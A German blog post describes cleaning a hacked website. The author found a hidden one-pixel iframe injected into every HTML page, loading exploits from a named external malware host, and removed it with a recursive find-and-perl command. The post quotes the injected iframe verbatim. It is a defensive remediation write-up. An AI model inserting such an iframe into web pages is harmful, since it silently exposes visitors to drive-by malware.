Webseite kompromittiert – mit Perl schnell repariert

Kein Kommentar Autor: Jürgen (jdo)
Malware auf der Webseite

Malware auf der Webseite

Ich habe einen Anruf bekommen, dass eine Webseite eine Virenwarnung bringt und bei Google und anderen Anbietern auf schwarzen Listen gelandet ist. Also Gummizelle (VirtualBox) angeworfen, die Seite besucht und den Quellcode angesehen. Stimm, die Seite liefert Malware aus (sieben Exploits). Folgender Code wurde eingepflanzt: <iframe src=”http://zarulem.com.tw/6000/index.php” width=”1″ height=”1″></iframe> (NICHT BESUCHEN DIE SEITE – NUR AUF EIGENE GEFAHR !!!) – bei einem Besuch wird man auf Google umgeleitet.

Eigentlich kein Problem, weil man den Eintrag einfach rausnehmen kann. Dumm ist nur, dass die Seite mit was auch immer erstellt wurde und etliche HTML-Dateien und Unterverzeichnisse enthält. Auf jeder Unterseite war natürlich der lästige iframe eingebettet. Entweder man kruscht sich nun durch den ganzen Wust und räumt manuell auf, oder man macht das ganze im Nerd-Stil. In meinem Fall Linux und Perl.

Da es sich immer um den selben Eintrag handelte sucht und ersetzt man in den HTML-Dateien einfach rekursiv:

find . -name "*.html" -exec perl -pi -w -e 's/<iframe src=\"http:\/\/zarulem\.com\.tw\/6000\/index.php\" width=\"1\" height=\"1\"><\/iframe>//g;' {} \;

Auch Interessant?

  1. Oh mein Gott, es ist am Leben!: Commodore OS Vision Beta
  2. Dezemberausgabe: freiesMagazin 12/2011 ist verfügbar
  3. Selbst ist der Nerd – Linux im Eigenbau: Linux From Scratch 7.1
  4. Bestes kostenlose VPN und unsere sicheren top Alternativen
  5. OpenVPN ist gesperrt und nun? SSTP hilft oftmals!

 Alle Kommentare als Feed abonnieren

Kommentare sind geschlossen.